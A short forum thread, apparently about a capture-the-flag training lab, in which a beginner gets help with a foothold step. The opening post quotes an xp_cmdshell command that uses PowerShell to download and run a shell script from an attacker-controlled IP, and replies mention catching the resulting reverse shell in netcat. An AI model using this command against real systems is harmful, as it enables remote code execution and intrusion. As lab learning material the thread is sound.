FootHold Starting point

hi ! i am a newbie (i guess that is how it writes), at here, i am at the FootHold on the Starting point tutorial, and at the moment to try
xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString("http://10.10.14.3/shell.ps1\“);”

i get

Exception calling “DownloadString” with “1” argument(s): “Unable to connect to the remote server”

At line:1 char:1

pls somebody help me, thanks everyone

Hey, I just did this one earlier today! Make sure you are using the correct IP address. 10.10.14.3 is just an example and you’ll need to change that value according to your network environment.

@VanguardRaider said:

Hey, I just did this one earlier today! Make sure you are using the correct IP address. 10.10.14.3 is just an example and you’ll need to change that value according to your network environment.

ok ill try

@VanguardRaider said:

i changed the ip in the xp cmdshell command and also in the shell archive, it seems it’s working, cause from i executed the command i still waiting…

it’s normal ?? …

@technopy That’s a good thing. Switch back to the terminal window running netcat (where you should be able to input commands to the remote machine) and see if you can follow the instructions from there!

ok ill do !

i saw netcat, and there was a # symbol, but as i didn’t knew that it was fine, i reestarted all proces from scratch, but thx, now i know that i was fine until that point, u saved me.

XD

Type your comment> @VanguardRaider said:

@technopy That’s a good thing. Switch back to the terminal window running netcat (where you should be able to input commands to the remote machine) and see if you can follow the instructions from there!

many many thanks, i made all again, and get this point, i just need continue the tutorial, really, so many thanks

i did it (yesterday) thanks, i got my first flag